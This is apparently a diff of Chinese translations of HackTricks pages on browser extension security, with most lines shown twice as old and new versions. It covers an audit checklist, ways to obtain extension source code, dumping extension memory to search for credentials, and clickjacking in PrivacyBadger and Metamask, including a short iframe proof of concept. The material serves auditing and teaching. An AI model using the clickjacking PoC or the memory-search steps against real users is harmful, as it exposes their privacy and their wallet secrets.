一个重要的考虑因素是,在设置多个页面接收`onMessage`事件的情况下,**第一个执行`sendResponse()`** 的页面将是唯一能够有效传递响应的页面。对同一事件的任何后续响应将不被考虑。
一个重要的考虑是,在多个页面设置为接收 `onMessage` 事件的情况下,**第一个执行 `sendResponse()`** 的页面将是唯一能够有效传递响应的页面。对同一事件的任何后续响应将不被考虑。
编写新扩展时,应优先选择使用 promises 而不是回调。关于回调的使用,`sendResponse()` 函数仅在直接在同步上下文中执行,或者如果事件处理程序指示异步操作通过返回`true`时才被视为有效。如果没有处理程序返回`true`,或者`sendResponse()`函数从内存中移除(被垃圾回收),则与`sendMessage()`函数关联的回调将默认触发。
创建新扩展时,应该优先使用承诺而不是回调。关于回调的使用,只有在同步上下文中直接执行 `sendResponse()` 函数,或者事件处理程序通过返回 `true` 表示异步操作时,`sendResponse()` 函数才被视为有效。如果没有任何处理程序返回 `true`,或者 `sendResponse()` 函数从内存中移除(被垃圾回收),则与 `sendMessage()` 函数关联的回调将默认触发。
## 内存/代码/剪贴板中的敏感信息
如果浏览器扩展在其内存中存储**敏感信息**,这些信息可能会被**转储**(特别是在 Windows 机器上)且可以对这些信息进行**搜索**。
如果浏览器扩展在**其内存中存储敏感信息**,则可能会被**转储**(特别是在 Windows 机器上)并**搜索**这些信息
因此,浏览器扩展的内存**不应被视为安全****敏感信息**如凭据或助记短语**不应该被存储**。
因此,浏览器扩展的内存**不应被视为安全****敏感信息**如凭据或助记短语**不应存储**。
当然,**不要将敏感信息放在代码中**,因为这将是**公开**的
当然,**不要在代码中放置敏感信息**,因为它将是**公开的**
要从浏览器转储内存,可以**转储进程内存**,或者转到浏览器扩展的**设置**,点击**`检查弹出窗口`** -> 在**`内存`**部分 -> **`拍摄快照`**,然后使用**`CTRL+F`**在快照中搜索敏感信息。
要从浏览器转储内存,可以**转储进程内存**,或者进入浏览器扩展的**设置**,点击**`Inspect pop-up`** -> 在**`Memory`**部分 -> **`Take a snapshot`**,然后使用**`CTRL+F`**在快照中搜索敏感信息。
此外,高度敏感信息如助记密钥或密码**不应允许复制到剪贴板**(或者至少在几秒钟内从剪贴板中删除),因为监视剪贴板的进程将能够获取它们。
此外,像助记密钥或密码这样的高度敏感信息**不应允许复制到剪贴板**(或者至少在几秒钟内将其从剪贴板中移除),因为这样监控剪贴板的进程将能够获取它们。
## 在浏览器中加载扩展
1. **下载**浏览器扩展并解压
1. **下载**浏览器扩展并解压
2. 转到**`chrome://extensions/`**并**启用**`开发者模式`
3. 点击**`加载已解压的扩展`**按钮
在**Firefox**中,您可以转到**`about:debugging#/runtime/this-firefox`**,然后点击**`加载临时附加组件`**按钮。
在**Firefox**中,转到**`about:debugging#/runtime/this-firefox`**并点击**`加载临时附加组件`**按钮。
## 从商店获取扩展的源代码
## 从商店获取源代码
可以通过各种方法获取 Chrome 扩展的源代码。以下是每个选项的详细说明和说明
Chrome 扩展的源代码可以通过多种方法获得。以下是每个选项的详细说明和指令
### 通过命令行下载扩展的 ZIP 文件
### 通过命令行将扩展下载为 ZIP
可以使用命令行将 Chrome 扩展的源代码下载为 ZIP 文件。这涉及使用`curl`从特定 URL 获取 ZIP 文件,然后将 ZIP 文件的内容提取到目录中。以下是步骤:
Chrome 扩展的源代码可以通过命令行下载为 ZIP 文件。这涉及使用 `curl` 从特定 URL 获取 ZIP 文件,然后将 ZIP 文件的内容提取到一个目录中。以下是步骤:
1. 将`"extension_id"`替换为扩展的实际 ID。
1. 将 `"extension_id"` 替换为扩展的实际 ID。
2. 执行以下命令:
```bash
extension_id=your_extension_id # Replace with the actual extension ID
@ -577,81 +580,81 @@ unzip -d "$extension_id-source" "$extension_id.zip"
### 使用 CRX Viewer 扩展
另一种方便的方法是使用 Chrome Extension Source Viewer这是一个开源项目。可以从[Chrome Web Store](https://chrome.google.com/webstore/detail/chrome-extension-source-v/jifpbeccnghkjeaalbbjmodiffmgedin?hl=en)安装。查看查看器的源代码可以在其[GitHub存储库](https://github.com/Rob--W/crxviewer)中找到。
另一种方便的方法是使用 Chrome 扩展源查看器,这是一个开源项目。可以从 [Chrome 网上应用店](https://chrome.google.com/webstore/detail/chrome-extension-source-v/jifpbeccnghkjeaalbbjmodiffmgedin?hl=en) 安装。查看器的源代码可在其 [GitHub 仓库](https://github.com/Rob--W/crxviewer) 中找到。
### 查看本地安装扩展源代码
### 查看本地安装扩展源代码
也可以检查本地安装的Chrome扩展。以下是方法:
本地安装的 Chrome 扩展也可以进行检查。方法如下
1. 访问Chrome本地配置文件目录访问`chrome://version/`并找到“Profile Path”字段
2. 转到配置文件目录中的`Extensions/`子文件夹。
3. 此文件夹包含所有已安装的扩展,通常以可读格式包含其源代码
1. 通过访问 `chrome://version/` 并找到“Profile Path”字段来访问您的 Chrome 本地配置文件目录
2. 在配置文件目录中导航到 `Extensions/` 子文件夹。
3. 此文件夹包含所有已安装的扩展,通常其源代码以可读格式存放
要识别扩展,可以将它们的ID映射到名称:
要识别扩展,您可以将其 ID 映射到名称:
* 在`about:extensions`页面上启用开发者模式以查看每个扩展的ID。
* 在每个扩展的文件夹中,`manifest.json`文件包含一个可读的`name`字段,帮助您识别扩展。
* 在 `about:extensions` 页面上启用开发者模式,以查看每个扩展的 ID。
* 在每个扩展的文件夹中,`manifest.json` 文件包含一个可读的 `name` 字段,帮助您识别扩展。
### 使用文件压缩工具或解包工具
### 使用文件归档程序或解压缩工具
前往Chrome Web Store并下载扩展。文件将具有`.crx`扩展名。将文件扩展名从`.crx`更改为`.zip`。使用任何文件压缩工具如WinRAR、7-Zip等来提取ZIP文件的内容。
前往 Chrome 网上应用店并下载扩展。文件将具有 `.crx` 扩展名。将文件扩展名从 `.crx` 更改为 `.zip`。使用任何文件归档程序(如 WinRAR、7-Zip 等)提取 ZIP 文件的内容。
### 在Chrome中使用开发者模式
### 在 Chrome 中使用开发者模式
打开Chrome并转到`chrome://extensions/`。在右上角启用“开发者模式”。单击“加载已解压的扩展...”。导航到扩展的目录。这不会下载源代码,但对于查看和修改已下载或开发的扩展的代码很有用。
打开 Chrome 并转到 `chrome://extensions/`。在右上角启用“开发者模式”。点击“加载已解压的扩展...”。导航到您的扩展目录。这不会下载源代码,但对于查看和修改已下载或开发的扩展的代码非常有用。
## 安全审计检查清单
尽管浏览器扩展具有**有限的攻击面**,但其中一些可能包含**漏洞**或**潜在的加固改进**。以下是最常见的:
尽管浏览器扩展具有 **有限的攻击面**,但其中一些可能包含 **漏洞** **潜在的加固改进**。以下是最常见的:
* [ ] **尽可能限制**请求的**`权限`**
* [ ] **尽可能限制**`host_permissions`**
* 使用**强大的** **`content_security_policy`**
* **尽可能限制**`externally_connectable`,如果不需要且可能,不要默认留,指定**`{}`**
* 如果此处提到**易受XSS攻击或接管**的URL则攻击者将能够**直接向后台脚本发送消息**。非常强大的绕过方式。
* **尽可能限制**`web_accessible_resources`,如果可能,甚至为空。
* 如果**`web_accessible_resources`**不是空的,请检查[**ClickJacking**](browext-clickjacking.md)
* 如果从**扩展**到**网页**有任何**通信**,请检查由通信引起的[**XSS漏洞**](browext-xss-example.md)
* 如果使用Post Messages请检查[**Post Message漏洞**](../postmessage-vulnerabilities/)**。**
* 如果**内容脚本访问DOM详细信息**,请检查它们是否通过网页**修改**而引入XSS
* 如果此通信还涉及**内容脚本 -> 后台脚本通信**,请特别强调
* **敏感信息不应存储**在浏览器扩展**代码**中
* **敏感信息不应存储**在浏览器扩展**内存**中
* [ ] **尽可能限制** 请求的 **`permissions`**
* [ ] **尽可能限制** **`host_permissions`**
* [ ] 使用 **强** **`content_security_policy`**
* [ ] **尽可能限制** **`externally_connectable`**,如果不需要且可能,不要默认留,指定 **`{}`**
* [ ] 如果提到 **URL 易受 XSS 或接管攻击**,攻击者将能够 **直接向后台脚本发送消息**。非常强大的绕过方式。
* [ ] **尽可能限制** **`web_accessible_resources`**,如果可能,甚至可以为空。
* [ ] 如果 **`web_accessible_resources`** 不是空的,请检查 [**ClickJacking**](browext-clickjacking.md)
* [ ] 如果有任何 **通信****扩展****网页**,请 [**检查 XSS**](browext-xss-example.md) **漏洞**
* [ ] 如果使用了 Post Messages请检查 [**Post Message 漏洞**](../postmessage-vulnerabilities/)**.**
* [ ] 如果 **内容脚本访问 DOM 细节**,请检查它们是否在被网页 **修改****引入 XSS**
* [ ] 如果此通信也涉及 **内容脚本 -> 后台脚本通信**,请特别强调。
* [ ] **敏感信息不应存储** 在浏览器扩展 **代码**
* [ ] **敏感信息不应存储** 在浏览器扩展 **内存**
## 工具
### [**Tarnish**](https://thehackerblog.com/tarnish/)
* 从提供的Chrome Webstore链接中提取任何Chrome扩展。
* [**manifest.json**](https://developer.chrome.com/extensions/manifest) **查看器**:简单显示扩展清单的JSON格式化版本。
* **指纹分析**:检测[web\_accessible\_resources](https://developer.chrome.com/extensions/manifest/web\_accessible\_resources)并自动生成Chrome扩展指纹识别JavaScript。
* **潜在的Clickjacking分析**:检测具有设置[web\_accessible\_resources](https://developer.chrome.com/extensions/manifest/web\_accessible\_resources)指令的扩展HTML页面。根据页面用途这些页面可能容易受到点击劫持攻击
* **权限警告查看器**显示用户尝试安装扩展时将显示的所有Chrome权限提示警告列表。
* **危险功能**显示可能被攻击者利用的危险功能位置例如innerHTML、chrome.tabs.executeScript等功能)。
* **入口点**:显示扩展接受用户/外部输入的位置。这对于了解扩展的表面积并寻找潜在的发送恶意数据到扩展的点很有用。
* 生成的警报包括以下内容:
* 引发警报的相关代码片段和行。
* 从提供的 Chrome 网上应用店链接提取任何 Chrome 扩展。
* [**manifest.json**](https://developer.chrome.com/extensions/manifest) **查看器**:简单地显示扩展的 manifest 的 JSON 美化版本。
* **指纹分析**:检测 [web\_accessible\_resources](https://developer.chrome.com/extensions/manifest/web\_accessible\_resources) 并自动生成 Chrome 扩展指纹 JavaScript。
* **潜在 Clickjacking 分析**:检测设置了 [web\_accessible\_resources](https://developer.chrome.com/extensions/manifest/web\_accessible\_resources) 指令的扩展 HTML 页面。这些页面可能易受 Clickjacking 攻击,具体取决于页面的目的
* **权限警告查看器**:显示用户尝试安装扩展时将显示的所有 Chrome 权限提示警告列表。
* **危险函数**:显示可能被攻击者利用的危险函数的位置(例如 innerHTML、chrome.tabs.executeScript 等函数)。
* **入口点**:显示扩展接收用户/外部输入的位置。这对于理解扩展的表面区域和寻找潜在的恶意数据发送点非常有用。
* 危险函数和入口点扫描器生成的警报包含以下内容:
* 相关代码片段和导致警报的行。
* 问题描述。
* “查看文件”按钮查看包含代码的完整源文件。
* “查看文件”按钮查看包含代码的完整源文件。
* 警报文件的路径。
* 警报文件的完整Chrome扩展URI。
* 文件类型,如后台页面脚本、内容脚本、浏览器操作等。
* 如果易受攻击的行在JavaScript文件中则包含所有包含此行的页面的路径以及这些页面的类型和[web\_accessible\_resource](https://developer.chrome.com/extensions/manifest/web\_accessible\_resources)状态。
* **内容安全策略CSP分析器和绕过检查器**这将指出您的扩展CSP中的弱点并且还将阐明由于白名单CDN等原因绕过CSP的潜在方法
* **已知的易受攻击库**:使用[Retire.js](https://retirejs.github.io/retire.js/)检查已知易受攻击的JavaScript库的使用情况
* 警报文件的完整 Chrome 扩展 URI。
* 文件类型,如后台页面脚本、内容脚本、浏览器操作等。
* 如果易受攻击的行在 JavaScript 文件中,包含所有包含该行的页面的路径以及这些页面的类型和 [web\_accessible\_resource](https://developer.chrome.com/extensions/manifest/web\_accessible\_resources) 状态。
* **内容安全策略 (CSP) 分析器和绕过检查器**:这将指出扩展的 CSP 中的弱点,并将揭示由于白名单 CDN 等可能绕过 CSP 的任何潜在方式
* **已知漏洞库**:使用 [Retire.js](https://retirejs.github.io/retire.js/) 检查是否使用了已知漏洞的 JavaScript 库
* 下载扩展和格式化版本。
* 下载原始扩展。
* 下载扩展的美化版本自动美化的HTML和JavaScript
* 自动缓存扫描结果,第一次运行扩展扫描将花费大量时间。但第二次,假设扩展未更新,由于结果被缓存,几乎瞬间完成
* 可链接的报告URL轻松地将其他人链接到由Tarnish生成的扩展报告。
* 下载美化版本的扩展(自动美化的 HTML JavaScript
* 自动缓存扫描结果,第一次运行扩展扫描将花费相当长的时间。然而,第二次运行时,假设扩展没有更新,将几乎是瞬时的,因为结果被缓存
* 可链接的报告 URL轻松将其他人链接到 tarnish 生成的扩展报告。
### [Neto](https://github.com/elevenpaths/neto)
Neto项目是一个Python 3包旨在分析和揭示浏览器插件和扩展的隐藏功能适用于Firefox和Chrome等知名浏览器。它自动化了解压打包文件以从扩展的相关资源中提取这些功能的过程如`manifest.json`、本地化文件夹或JavaScript和HTML源文件
Neto 项目是一个 Python 3 包,旨在分析和揭示知名浏览器(如 Firefox 和 Chrome浏览器插件和扩展的隐藏功能。它自动解压打包文件的过程以从扩展中的相关资源`manifest.json`、本地化文件夹或 JavaScript 和 HTML 源文件)中提取这些功能
## 参考资料
## 参考文献
* **感谢**[**@naivenom**](https://twitter.com/naivenom)**对本方法的帮助**
* **感谢** [**@naivenom**](https://twitter.com/naivenom) **对本方法的帮助**
* [https://www.cobalt.io/blog/introduction-to-chrome-browser-extension-security-testing](https://www.cobalt.io/blog/introduction-to-chrome-browser-extension-security-testing)
* [https://palant.info/2022/08/10/anatomy-of-a-basic-extension/](https://palant.info/2022/08/10/anatomy-of-a-basic-extension/)
* [https://palant.info/2022/08/24/attack-surface-of-extension-pages/](https://palant.info/2022/08/24/attack-surface-of-extension-pages/)
@ -662,13 +665,17 @@ Neto项目是一个Python 3包旨在分析和揭示浏览器插件和扩展
* [https://thehackerblog.com/kicking-the-rims-a-guide-for-securely-writing-and-auditing-chrome-extensions/](https://thehackerblog.com/kicking-the-rims-a-guide-for-securely-writing-and-auditing-chrome-extensions/)
* [https://gist.github.com/LongJohnCoder/9ddf5735df3a4f2e9559665fb864eac0](https://gist.github.com/LongJohnCoder/9ddf5735df3a4f2e9559665fb864eac0)
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,54 +1,55 @@
# BrowExt - 点击劫持
# BrowExt - ClickJacking
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
## 基本信息
本页面将利用浏览器扩展中的点击劫持漏洞。\
如果您不知道什么是点击劫持,请查看:
本页面将利用浏览器扩展中的 ClickJacking 漏洞。\
如果你不知道 ClickJacking 是什么,请查看:
{% content-ref url="../clickjacking.md" %}
[clickjacking.md](../clickjacking.md)
{% endcontent-ref %}
扩展包含文件**`manifest.json`**该JSON文件有一个字段`web_accessible_resources`。以下是[Chrome文档](https://developer.chrome.com/extensions/manifest/web\_accessible\_resources)对此的解释
扩展包含文件 **`manifest.json`**,该 JSON 文件有一个字段 `web_accessible_resources`。以下是 [Chrome 文档](https://developer.chrome.com/extensions/manifest/web\_accessible\_resources) 对此的说明
> 这些资源将通过URL **`chrome-extension://[PACKAGE ID]/[PATH]`** 在网页中可用,可以使用**`extension.getURL方法`**生成。经过白名单授权的资源将使用适当的CORS标头提供因此可以通过诸如XHR之类的机制访问。[1](https://blog.lizzie.io/clickjacking-privacy-badger.html#fn.1)
> 这些资源将通过 URL **`chrome-extension://[PACKAGE ID]/[PATH]`** 在网页中可用,可以通过 **`extension.getURL method`** 生成。允许的资源会带有适当的 CORS 头,因此可以通过 XHR 等机制访问。[1](https://blog.lizzie.io/clickjacking-privacy-badger.html#fn.1)
浏览器扩展中的**`web_accessible_resources`**不仅可以通过网络访问,还可以利用扩展的固有特权。这意味着它们具有以下功能
浏览器扩展中的 **`web_accessible_resources`** 不仅可以通过网络访问;它们还具有扩展的固有权限。这意味着它们能够
- 更改扩展的状态
- 加载其他资源
- 在一定程度上与浏览器交互
* 更改扩展的状态
* 加载额外的资源
* 在一定程度上与浏览器交互
然而,这个功能存在安全风险。如果**`web_accessible_resources`**中的资源具有任何重要功能,攻击者可能会将此资源嵌入到外部网页中。访问此页面的无意用户可能会意外激活此嵌入式资源。根据扩展资源的权限和功能,此激活可能导致意想不到的后果
然而,这一特性带来了安全风险。如果 **`web_accessible_resources`** 中的某个资源具有任何重要功能,攻击者可能会将该资源嵌入到外部网页中。毫不知情的用户访问此页面时,可能会无意中激活此嵌入的资源。这种激活可能会导致意想不到的后果,具体取决于扩展资源的权限和能力
## PrivacyBadger示例
## PrivacyBadger 示例
在扩展程序PrivacyBadger中发现了一个与`skin/`目录声明为`web_accessible_resources`相关的漏洞,声明方式如下(查看原始[博客文章](https://blog.lizzie.io/clickjacking-privacy-badger.html):
在扩展 PrivacyBadger 中,发现了一个与 `skin/` 目录被声明为 `web_accessible_resources` 相关的漏洞,具体如下(查看原始 [博客文章](https://blog.lizzie.io/clickjacking-privacy-badger.html)
```json
"web_accessible_resources": [
"skin/*",
"icons/*"
]
```
这种配置导致了潜在的安全问题。具体来说,`skin/popup.html` 文件在与浏览器中的 PrivacyBadger 图标交互时呈现,可能被嵌入到一个 `iframe` 中。这种嵌入可能被利用来欺骗用户,使其无意中点击“为此网站禁用 PrivacyBadger”。这样的操作将通过禁用 PrivacyBadger 保护来危及用户的隐私,并可能使用户受到更多跟踪的影响。可以在提供的 ClickJacking 视频示例中查看此漏洞的视觉演示:[**https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm**](https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm)。
配置导致了潜在的安全问题。具体来说,`skin/popup.html` 文件在与浏览器中的 PrivacyBadger 图标交互时呈现,可以嵌入在 `iframe` 中。此嵌入可能被利用来欺骗用户无意中点击“为此网站禁用 PrivacyBadger”。这样的行为将通过禁用 PrivacyBadger 保护来危害用户的隐私,并可能使用户面临更高的跟踪风险。此漏洞的视觉演示可以在 [**https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm**](https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm) 提供的 ClickJacking 视频示例中查看
为了解决这个漏洞,实施了一个简单直接的解决方案:从 `web_accessible_resources` 列表中移除 `/skin/*`。这一变更有效地通过确保 `skin/` 目录的内容不能通过 web 可访问资源访问或操纵来减轻了风险
为了解决此漏洞,实施了一个简单的解决方案:从 `web_accessible_resources` 列表中移除 `/skin/*`。此更改有效地降低了风险,确保 `skin/` 目录的内容无法通过网络可访问资源进行访问或操控
修复方法很简单:**从 `web_accessible_resources` 中移除 `/skin/*`**。
修复很简单:**从 `web_accessible_resources` 中移除 `/skin/*`**。
### PoC
```html
@ -89,37 +90,38 @@ click me
<iframe src="chrome-extension://ablpimhddhnaldgkfbpafchflffallca/skin/popup.html">
</iframe>
```
## Metamask Example
## Metamask 示例
[**关于Metamask中ClickJacking的博文可以在这里找到**](https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9)。在这种情况下Metamask通过检查用于访问它的协议是否为**`https:`**或**`http:`**(例如不是**`chrome:`**)来修复了漏洞:
一个关于 Metamask 中 ClickJacking 的 [**博客文章可以在这里找到**](https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9)。在这种情况下Metamask 通过检查访问所使用的协议是否为 **`https:`** 或 **`http:`**(而不是 **`chrome:`** 例如)来修复该漏洞:
<figure><img src="../../.gitbook/assets/image (21).png" alt=""><figcaption></figcaption></figure>
Metamask扩展中的**另一个ClickJacking漏洞**是用户可以在页面可疑被钓鱼时**点击以将其加入白名单**,因为存在`“web_accessible_resources”: [“inpage.js”, “phishing.html”]`。由于该页面容易受到Clickjacking攻击攻击者可以滥用它显示正常内容使受害者在不知情的情况下点击将其加入白名单然后返回到被加入白名单的钓鱼页面。
**在 Metamask 扩展中修复的另一个 ClickJacking** 是用户能够在页面被怀疑为钓鱼时 **点击白名单**,因为 `“web_accessible_resources”: [“inpage.js”, “phishing.html”]`。由于该页面易受 Clickjacking 攻击,攻击者可以利用它显示一些正常的内容,使受害者在未注意的情况下点击以将其列入白名单,然后返回到将被列入白名单的钓鱼页面。
## Steam Inventory Helper Example
## Steam Inventory Helper 示例
查看以下页面,了解浏览器扩展中的**XSS**是如何与**ClickJacking**漏洞链接在一起的
查看以下页面以检查浏览器扩展中的 **XSS** 如何与 **ClickJacking** 漏洞链式结合
{% content-ref url="browext-xss-example.md" %}
[browext-xss-example.md](browext-xss-example.md)
{% endcontent-ref %}
## References
## 参考文献
* [https://blog.lizzie.io/clickjacking-privacy-badger.html](https://blog.lizzie.io/clickjacking-privacy-badger.html)
* [https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9](https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9)
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS Family**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来**分享您的黑客技巧**。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,38 +1,39 @@
# BrowExt - 权限和主机权限
# BrowExt - permissions & host\_permissions
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
- **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
## 基本信息
### **`permissions`**
权限在扩展的**`manifest.json`**文件中使用**`permissions`**属性进行定义,允许访问几乎任何浏览器可以访问的内容(Cookies或物理存储
权限在扩展的 **`manifest.json`** 文件中使用 **`permissions`** 属性定义,允许访问浏览器可以访问的几乎所有内容Cookies 或物理存储):
上述清单声明扩展需要`storage`权限。这意味着它可以使用[存储API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/storage)来持久存储数据。与给用户一定程度控制权的cookies或`localStorage` API不同,**扩展存储通常只能通过卸载扩展来清除**。
前面的清单声明该扩展需要 `storage` 权限。这意味着它可以使用 [存储 API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/storage) 持久存储其数据。与给用户一定控制权的 cookies 或 `localStorage` API 不同,**扩展存储通常只能通过卸载扩展来清除**。
扩展将在其**`manifest.json`**文件中请求所需的权限,安装扩展后,您可以**随时在浏览器中检查其权限**,如下图所示:
扩展将请求其 **`manifest.json`** 文件中指示的权限。安装扩展后,您可以 **随时在浏览器中检查其权限**,如图所示:
<figure><img src="../../.gitbook/assets/image (18).png" alt=""><figcaption></figcaption></figure>
